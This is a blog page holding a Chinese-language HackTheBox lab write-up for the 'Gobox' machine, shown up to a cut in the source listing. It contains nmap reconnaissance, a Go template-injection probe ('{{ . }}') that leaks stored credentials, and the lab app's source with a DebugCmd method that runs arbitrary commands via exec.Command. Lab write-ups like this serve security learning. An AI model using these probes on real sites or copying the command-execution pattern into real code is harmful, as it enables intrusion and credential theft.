<!DOCTYPE html>


<html theme="dark" showBanner="true" hasBanner="desktop" > 
<link href="https://cdn.staticfile.org/font-awesome/6.4.2/css/fontawesome.min.css" rel="stylesheet">
<link href="https://cdn.staticfile.org/font-awesome/6.4.2/css/brands.min.css" rel="stylesheet">
<link href="https://cdn.staticfile.org/font-awesome/6.4.2/css/solid.min.css" rel="stylesheet">
<script src="/js/color.global.min.js" ></script>
<script src="/js/load-settings.js" ></script>
<head>
  <meta charset="utf-8">
  
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-84TPQBH5EH"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-84TPQBH5EH');
</script>
<!-- End Google Analytics -->

  
  

  
  <title>Tracks-cloud-Gobox | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  <link rel="preload" href="/css/fonts/Roboto-Regular.ttf" as="font" type="font/ttf" crossorigin="anonymous">
  <link rel="preload" href="/css/fonts/Roboto-Bold.ttf" as="font" type="font/ttf" crossorigin="anonymous">

  <meta name="description" content="nmap1234567891011121314151617181920212223242526272829└─$ sudo nmap -sS 10.10.11.113 -p- --min-rate&#x3D;2000Starting Nmap 7.94SVN ( https:&#x2F;&#x2F;nmap.org ) at 2024-11-26 23:54 ESTStats: 0:00:00 elapsed; 0 hosts">
<meta property="og:type" content="article">
<meta property="og:title" content="Tracks-cloud-Gobox">
<meta property="og:url" content="http://example.com/2024/11/27/Tracks-cloud-Gobox/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="nmap1234567891011121314151617181920212223242526272829└─$ sudo nmap -sS 10.10.11.113 -p- --min-rate&#x3D;2000Starting Nmap 7.94SVN ( https:&#x2F;&#x2F;nmap.org ) at 2024-11-26 23:54 ESTStats: 0:00:00 elapsed; 0 hosts">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/wpimages/2024/tracks-cloud/Gobox/background.jpg">
<meta property="article:published_time" content="2024-11-27T08:50:32.000Z">
<meta property="article:modified_time" content="2024-11-29T09:16:41.762Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="wp">
<meta property="article:tag" content="aws">
<meta property="article:tag" content="s3">
<meta property="article:tag" content="nginx">
<meta property="article:tag" content="ssti">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/wpimages/2024/tracks-cloud/Gobox/background.jpg">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-192.png" sizes="192x192">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-192.png" sizes="192x192">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 7.1.1"></head>

<body>
  
  
    
<div id="banner" class="">
  <img src="/images/backgroup.jpg" itemprop="image">
  <div id="banner-dim"></div>
</div>
 
   
  <div id="main-grid" class="  ">
    <div id="nav" class=""  >
      <navbar id="navbar">
  <nav id="title-nav">
    <a href="/">
      <div id="vivia-logo">
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
      </div>
      <div>Hexo </div>
    </a>
  </nav>
  <nav id="main-nav">
    
      <a class="main-nav-link" href="/">Home</a>
    
      <a class="main-nav-link" href="/about">About</a>
    
  </nav>
  <nav id="sub-nav">
    <a id="theme-btn" class="nav-icon">
      <span class="light-mode-icon"><svg xmlns="http://www.w3.org/2000/svg" height="20" viewBox="0 -960 960 960" width="20"><path d="M438.5-829.913v-48q0-17.452 11.963-29.476 11.964-12.024 29.326-12.024 17.363 0 29.537 12.024t12.174 29.476v48q0 17.452-11.963 29.476-11.964 12.024-29.326 12.024-17.363 0-29.537-12.024T438.5-829.913Zm0 747.826v-48q0-17.452 11.963-29.476 11.964-12.024 29.326-12.024 17.363 0 29.537 12.024t12.174 29.476v48q0 17.452-11.963 29.476-11.964 12.024-29.326 12.024-17.363 0-29.537-12.024T438.5-82.087ZM877.913-438.5h-48q-17.452 0-29.476-11.963-12.024-11.964-12.024-29.326 0-17.363 12.024-29.537t29.476-12.174h48q17.452 0 29.476 11.963 12.024 11.964 12.024 29.326 0 17.363-12.024 29.537T877.913-438.5Zm-747.826 0h-48q-17.452 0-29.476-11.963-12.024-11.964-12.024-29.326 0-17.363 12.024-29.537T82.087-521.5h48q17.452 0 29.476 11.963 12.024 11.964 12.024 29.326 0 17.363-12.024 29.537T130.087-438.5Zm660.174-290.87-34.239 32q-12.913 12.674-29.565 12.174-16.653-.5-29.327-13.174-12.674-12.673-12.554-28.826.12-16.152 12.794-28.826l33-35q12.913-12.674 30.454-12.674t30.163 12.847q12.709 12.846 12.328 30.826-.38 17.98-13.054 30.653ZM262.63-203.978l-32 34q-12.913 12.674-30.454 12.674t-30.163-12.847q-12.709-12.846-12.328-30.826.38-17.98 13.054-30.653l33.239-31q12.913-12.674 29.565-12.174 16.653.5 29.327 13.174 12.674 12.673 12.554 28.826-.12 16.152-12.794 28.826Zm466.74 33.239-32-33.239q-12.674-12.913-12.174-29.565.5-16.653 13.174-29.327 12.673-12.674 28.826-13.054 16.152-.38 28.826 12.294l35 33q12.674 12.913 12.674 30.454t-12.847 30.163q-12.846 12.709-30.826 12.328-17.98-.38-30.653-13.054ZM203.978-697.37l-34-33q-12.674-12.913-13.174-29.945-.5-17.033 12.174-29.707t31.326-13.293q18.653-.62 31.326 13.054l32 34.239q11.674 12.913 11.174 29.565-.5 16.653-13.174 29.327-12.673 12.674-28.826 12.554-16.152-.12-28.826-12.794ZM480-240q-100 0-170-70t-70-170q0-100 70-170t170-70q100 0 170 70t70 170q0 100-70 170t-170 70Zm-.247-82q65.703 0 111.475-46.272Q637-414.544 637-480.247t-45.525-111.228Q545.95-637 480.247-637t-111.475 45.525Q323-545.95 323-480.247t45.525 111.975Q414.05-322 479.753-322ZM481-481Z"/></svg></span>
      <span class="dark-mode-icon"><svg xmlns="http://www.w3.org/2000/svg" height="20" viewBox="0 -960 960 960" width="20"><path d="M480.239-116.413q-152.63 0-258.228-105.478Q116.413-327.37 116.413-480q0-130.935 77.739-227.435t206.304-125.043q43.022-9.631 63.87 10.869t3.478 62.805q-8.891 22.043-14.315 44.463-5.424 22.42-5.424 46.689 0 91.694 64.326 155.879 64.325 64.186 156.218 64.186 24.369 0 46.978-4.946 22.609-4.945 44.413-14.076 42.826-17.369 62.967 1.142 20.142 18.511 10.511 61.054Q807.174-280 712.63-198.206q-94.543 81.793-232.391 81.793Zm0-95q79.783 0 143.337-40.217 63.554-40.218 95.793-108.283-15.608 4.044-31.097 5.326-15.49 1.283-31.859.805-123.706-4.066-210.777-90.539-87.071-86.473-91.614-212.092-.24-16.369.923-31.978 1.164-15.609 5.446-30.978-67.826 32.478-108.282 96.152Q211.652-559.543 211.652-480q0 111.929 78.329 190.258 78.329 78.329 190.258 78.329ZM466.13-465.891Z"/></svg></span>
    </a>
    
      <a id="nav-rss-link" class="nav-icon mobile-hide" href="/atom.xml" title="RSS Feed">
        <svg xmlns="http://www.w3.org/2000/svg" height="20" viewBox="0 -960 960 960" width="20"><path d="M198-120q-25.846 0-44.23-18.384-18.384-18.385-18.384-44.23 0-25.846 18.384-44.23 18.384-18.385 44.23-18.385 25.846 0 44.23 18.385 18.384 18.384 18.384 44.23 0 25.845-18.384 44.23Q223.846-120 198-120Zm538.385 0q-18.846 0-32.923-13.769-14.076-13.769-15.922-33.23-8.692-100.616-51.077-188.654-42.385-88.039-109.885-155.539-67.5-67.501-155.539-109.885Q283-663.462 182.385-672.154q-19.461-1.846-33.23-16.23-13.769-14.385-13.769-33.846t14.076-32.922q14.077-13.461 32.923-12.23 120.076 8.692 226.038 58.768 105.961 50.077 185.73 129.846 79.769 79.769 129.846 185.731 50.077 105.961 58.769 226.038 1.231 18.846-12.538 32.922Q756.461-120 736.385-120Zm-252 0q-18.231 0-32.423-13.461t-18.653-33.538Q418.155-264.23 348.886-333.5q-69.27-69.27-166.501-84.423-20.077-4.462-33.538-18.961-13.461-14.5-13.461-33.346 0-19.076 13.884-33.23 13.884-14.153 33.115-10.922 136.769 15.384 234.384 112.999 97.615 97.615 112.999 234.384 3.231 19.23-10.538 33.115Q505.461-120 484.385-120Z"/></svg>
      </a>
    
    <div id="nav-menu-btn" class="nav-icon">
      <svg xmlns="http://www.w3.org/2000/svg" height="20" viewBox="0 -960 960 960" width="20"><path d="M177.37-252.282q-17.453 0-29.477-11.964-12.024-11.963-12.024-29.326t12.024-29.537q12.024-12.174 29.477-12.174h605.26q17.453 0 29.477 11.964 12.024 11.963 12.024 29.326t-12.024 29.537q-12.024 12.174-29.477 12.174H177.37Zm0-186.218q-17.453 0-29.477-11.963-12.024-11.964-12.024-29.326 0-17.363 12.024-29.537T177.37-521.5h605.26q17.453 0 29.477 11.963 12.024 11.964 12.024 29.326 0 17.363-12.024 29.537T782.63-438.5H177.37Zm0-186.217q-17.453 0-29.477-11.964-12.024-11.963-12.024-29.326t12.024-29.537q12.024-12.174 29.477-12.174h605.26q17.453 0 29.477 11.964 12.024 11.963 12.024 29.326t-12.024 29.537q-12.024 12.174-29.477 12.174H177.37Z"/></svg>
    </div>
  </nav>
</navbar>
<div id="nav-dropdown" class="hidden">
  <div id="dropdown-link-list">
    
      <a class="nav-dropdown-link" href="/">Home</a>
    
      <a class="nav-dropdown-link" href="/about">About</a>
    
    
      <a class="nav-dropdown-link" href="/atom.xml" title="RSS Feed">RSS</a>
     
    </div>
</div>
<script>
  let dropdownBtn = document.getElementById("nav-menu-btn");
  let dropdownEle = document.getElementById("nav-dropdown");
  dropdownBtn.onclick = function() {
    dropdownEle.classList.toggle("hidden");
  }
</script>
    </div>
    <div id="sidebar-wrapper">
      <sidebar id="sidebar">
  
    <div class="widget-wrap">
  <div class="info-card">
    <div class="avatar">
      
        <image src=/images/avatar.jpg></image>
      
      <div class="img-dim"></div>
    </div>
    <div class="info">
      <div class="username">Flower </div>
      <div class="dot"></div>
      <div class="subtitle">Hi Im Flower </div>
      <div class="link-list">
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://twitter.com" title="Twitter"><i class="fa-brands fa-twitter"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://store.steampowered.com" title="Steam"><i class="fa-brands fa-steam"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://github.com" title="GitHub"><i class="fa-brands fa-github"></i></a>
         
      </div>  
    </div>
  </div>
</div>

  
    
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Tags</h3>
      <ul class="widget-tag-list" itemprop="keywords"><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/AD/" rel="tag">AD</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/AS-REQ-ST/" rel="tag">AS-REQ ST</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/AllowedtoAct/" rel="tag">AllowedtoAct</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/CVE-2024-36467/" rel="tag">CVE-2024-36467</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/CVE-2024-42327/" rel="tag">CVE-2024-42327</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/DACL/" rel="tag">DACL</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Forensic/" rel="tag">Forensic</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Nmap/" rel="tag">Nmap</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/SQL-injection/" rel="tag">SQL injection</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Tips/" rel="tag">Tips</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Zabbix/" rel="tag">Zabbix</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/aws/" rel="tag">aws</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/azure-devops/" rel="tag">azure devops</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/azureAD/" rel="tag">azureAD</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/blockchain/" rel="tag">blockchain</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/brute-rid/" rel="tag">brute-rid</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/bypass-kerberos-only/" rel="tag">bypass-kerberos-only</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/cd/" rel="tag">cd</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/deb/" rel="tag">deb</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/dpapi/" rel="tag">dpapi</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/fishing/" rel="tag">fishing</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/gamepwn/" rel="tag">gamepwn</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/ghost/" rel="tag">ghost</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/h2/" rel="tag">h2</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/jwt/" rel="tag">jwt</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/k8s/" rel="tag">k8s</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/kcd/" rel="tag">kcd</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/merge/" rel="tag">merge</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/misc/" rel="tag">misc</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/nginx/" rel="tag">nginx</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/no-preAuth/" rel="tag">no-preAuth</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/nodejs/" rel="tag">nodejs</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/poc/" rel="tag">poc</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/pods/" rel="tag">pods</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/pre2k/" rel="tag">pre2k</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/rbcd/" rel="tag">rbcd</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/remote-potato/" rel="tag">remote-potato</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/rootkit/" rel="tag">rootkit</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/rosating/" rel="tag">rosating</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/s3/" rel="tag">s3</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/sercerts/" rel="tag">sercerts</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/ssti/" rel="tag">ssti</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/study/" rel="tag">study</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/svn/" rel="tag">svn</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/symlink/" rel="tag">symlink</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/winlogon/" rel="tag">winlogon</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/wp/" rel="tag">wp</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E5%AE%9E%E4%BE%8B%E8%AE%B0%E5%BD%95/" rel="tag">实例记录</a></li></ul>
    </div>
  </div>


  
  <div class="sticky">
    
      


  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Categories</h3>
      <div class="category-box">
            <a class="category-link" href="/categories/cloud/">
                cloud
                <div class="category-count">7</div>
            </a>
        
            <a class="category-link" href="/categories/htb-Season-5/">
                htb-Season-5
                <div class="category-count">7</div>
            </a>
        
            <a class="category-link" href="/categories/htb-Season-6/">
                htb-Season-6
                <div class="category-count">9</div>
            </a>
        
            <a class="category-link" href="/categories/htb-Season-4/">
                htb-Season-4
                <div class="category-count">3</div>
            </a>
        
            <a class="category-link" href="/categories/ctf/">
                ctf
                <div class="category-count">7</div>
            </a>
        
            <a class="category-link" href="/categories/Sherlocks/">
                Sherlocks
                <div class="category-count">1</div>
            </a>
        
            <a class="category-link" href="/categories/AD/">
                AD
                <div class="category-count">1</div>
            </a>
        
            <a class="category-link" href="/categories/CVE/">
                CVE
                <div class="category-count">1</div>
            </a>
        </div>
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Recent Posts</h3>
      <ul>
        
          <a class="recent-link" href="/2024/12/14/box-wp-Unrested/" title="【CVE machines】 htb Unrested wp" >
            <div class="recent-link-text">
              【CVE machines】 htb Unrested wp
            </div>
          </a>
        
          <a class="recent-link" href="/2024/12/12/Tracks-AD-Rebound/" title="Tracks-AD-Rebound" >
            <div class="recent-link-text">
              Tracks-AD-Rebound
            </div>
          </a>
        
          <a class="recent-link" href="/2024/12/08/Tracks-cloud-Unobtianium/" title="Tracks-cloud-Unobtianium" >
            <div class="recent-link-text">
              Tracks-cloud-Unobtianium
            </div>
          </a>
        
          <a class="recent-link" href="/2024/12/08/box-wp-LinkVortex/" title="【season-6】 htb LinkVortex wp" >
            <div class="recent-link-text">
              【season-6】 htb LinkVortex wp
            </div>
          </a>
        
          <a class="recent-link" href="/2024/12/03/box-wp-Vintage/" title="【season-6】 htb Vintage wp" >
            <div class="recent-link-text">
              【season-6】 htb Vintage wp
            </div>
          </a>
        
      </ul>
    </div>
  </div>

    
  </div>
</sidebar>
    </div>
    <div id="content-body">
       


<article id="post-Tracks-cloud-Gobox" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  
    
<div class="article-gallery">
  <div class="article-gallery-photos">
    
      <a class="article-gallery-img" rel="gallery_cm4gvs8fj0006zoky5fsr26nd">
        <img src="/wpimages/2024/tracks-cloud/Gobox/background.jpg" itemprop="image">
      </a>
    
  </div>
</div>

   
  <div class="article-inner">
    <div class="article-main">
      <header class="article-header">
        
<div class="main-title-bar">
  <div class="main-title-dot"></div>
  
    
      <h1 class="p-name article-title" itemprop="headline name">
        Tracks-cloud-Gobox
      </h1>
    
  
</div>

        <div class='meta-info-bar'>
          <div class="meta-info">
  <time class="dt-published" datetime="2024-11-27T08:50:32.000Z" itemprop="datePublished">2024-11-27</time>
</div>
          <div class="need-seperator meta-info">
            <div class="meta-cate-flex">
  
  <a class="meta-cate-link" href="/categories/cloud/">cloud</a>
   
</div>
  
          </div>
          <div class="wordcount need-seperator meta-info">
            10k words 
          </div>
        </div>
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/aws/" rel="tag">aws</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/nginx/" rel="tag">nginx</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/s3/" rel="tag">s3</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ssti/" rel="tag">ssti</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/wp/" rel="tag">wp</a></li></ul>

      </header>
      <div class="e-content article-entry" itemprop="articleBody">
        
          <h2 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">└─$ sudo nmap -sS 10.10.11.113 -p- --min-rate=2000</span><br><span class="line">Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 23:54 EST</span><br><span class="line">Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan</span><br><span class="line">Ping Scan Timing: About 50.00% <span class="keyword">done</span>; ETC: 23:54 (0:00:00 remaining)</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 10.10.11.113</span><br><span class="line">Host is up (0.35s latency).</span><br><span class="line">Not shown: 65528 closed tcp ports (reset)</span><br><span class="line">PORT     STATE    SERVICE</span><br><span class="line">22/tcp   open     ssh</span><br><span class="line">80/tcp   open     http</span><br><span class="line">4566/tcp open     kwtc</span><br><span class="line">8080/tcp open     http-proxy</span><br><span class="line">9000/tcp filtered cslistener</span><br><span class="line">9001/tcp filtered tor-orport</span><br><span class="line">9002/tcp filtered dynamid</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">└─$ sudo nmap -sS 10.10.11.113 -p80,4566,8080 -sVC --min-rate=2000</span><br><span class="line">Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 23:55 EST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 10.10.11.113</span><br><span class="line">Host is up (0.23s latency).</span><br><span class="line"></span><br><span class="line">PORT     STATE SERVICE VERSION</span><br><span class="line">80/tcp   open  http    nginx</span><br><span class="line">|_http-title: Hacking eSports | &#123;&#123;.Title&#125;&#125;</span><br><span class="line">4566/tcp open  http    nginx</span><br><span class="line">|_http-title: 403 Forbidden</span><br><span class="line">8080/tcp open  http    nginx</span><br><span class="line">|_http-title: Hacking eSports | Home page</span><br></pre></td></tr></table></figure>


<h2 id="to-User"><a href="#to-User" class="headerlink" title="to User"></a>to User</h2><p>80是一个未被渲染的模板，这里从他的title足以看出</p>
<p>4566访问报错</p>
<p>只剩下来8080是正常的</p>
<p>在发包的时候发现对侧的回显header部分<code>X-Forwarded-Server: golang</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">HTTP/1.1 200 OK</span><br><span class="line"></span><br><span class="line">Server: nginx</span><br><span class="line"></span><br><span class="line">Date: Wed, 27 Nov 2024 06:30:05 GMT</span><br><span class="line"></span><br><span class="line">Content-Type: text/html; charset=utf-8</span><br><span class="line"></span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line">X-Forwarded-Server: golang</span><br><span class="line"></span><br><span class="line">Content-Length: 1642</span><br></pre></td></tr></table></figure>

<p>其还有一个<code>/forgot/</code>路径，在访问时title由</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Hacking eSports | Home page -&gt; Hacking eSports | Forgot Password</span><br></pre></td></tr></table></figure>

<p>再结合80的title<code>Hacking eSports | &#123;&#123;.Title&#125;&#125;</code></p>
<p>很容易就会联想到ssti，直接搜<code>go ssti</code></p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://forum.butian.net/share/1286">https://forum.butian.net/share/1286</a></p>
</blockquote>
<p>和jinja不同的是go的ssti没有可以调用链条或者原生的危险方法</p>
<p>但却可以调用本项目所定义的方法、函数、渲染对象。</p>
<p>与补天这篇文章给的例子相同，这台box也存在同样的信息泄露问题。</p>
<p>当我给<code>&#123;&#123; . &#125;&#125;</code>时，服务器返回了它渲染所使用的User结构实例化对象中的所有信息,实际场景中我想应该不会有人这么些码字。</p>
<p><img src="/wpimages/2024/tracks-cloud/Gobox/image-1.png" alt="alt text"></p>
<p>其中回显了u&#x2F;p</p>
<p>拿来登录进入后会得到web的源码</p>
<figure class="highlight golang"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span>(</span><br><span class="line">    <span class="string">&quot;html/template&quot;</span></span><br><span class="line">    <span class="string">&quot;net/http&quot;</span></span><br><span class="line">    <span class="string">&quot;log&quot;</span></span><br><span class="line">    <span class="string">&quot;os/exec&quot;</span></span><br><span class="line">    <span class="string">&quot;fmt&quot;</span></span><br><span class="line">    <span class="string">&quot;bytes&quot;</span></span><br><span class="line">    <span class="string">&quot;strings&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="comment">// compile all templates and cache them</span></span><br><span class="line"><span class="keyword">var</span> templates = template.Must(template.ParseGlob(<span class="string">&quot;templates/*&quot;</span>))</span><br><span class="line"></span><br><span class="line"><span class="keyword">type</span> Data <span class="keyword">struct</span> &#123;</span><br><span class="line">    Title <span class="type">string</span> <span class="comment">// Must be exported!</span></span><br><span class="line">    Body <span class="type">string</span>  <span class="comment">// Must be exported!</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">type</span> User <span class="keyword">struct</span> &#123;</span><br><span class="line">        ID       <span class="type">int</span></span><br><span class="line">        Email    <span class="type">string</span></span><br><span class="line">        Password <span class="type">string</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(u User)</span></span> DebugCmd (test <span class="type">string</span>) <span class="type">string</span> &#123;</span><br><span class="line">  ipp := strings.Split(test, <span class="string">&quot; &quot;</span>)</span><br><span class="line">  bin := strings.Join(ipp[:<span class="number">1</span>], <span class="string">&quot; &quot;</span>)</span><br><span class="line">  args := strings.Join(ipp[<span class="number">1</span>:], <span class="string">&quot; &quot;</span>)</span><br><span class="line">  <span class="keyword">if</span> <span class="built_in">len</span>(args) &gt; <span class="number">0</span>&#123;</span><br><span class="line">    out, _ := exec.Command(bin, args).CombinedOutput()</span><br><span class="line">    <span class="keyword">return</span> <span class="type">string</span>(out)</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    out, _ := exec.Command(bin).CombinedOutput()</span><br><span class="line">    <span class="keyword">return</span> <span class="type">string</span>(out)</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Renders the templates</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">renderTemplate</span><span class="params">(w http.ResponseWriter, tmpl <span class="type">string</span>, page *Data)</span></span> &#123;</span><br><span class="line">	err := 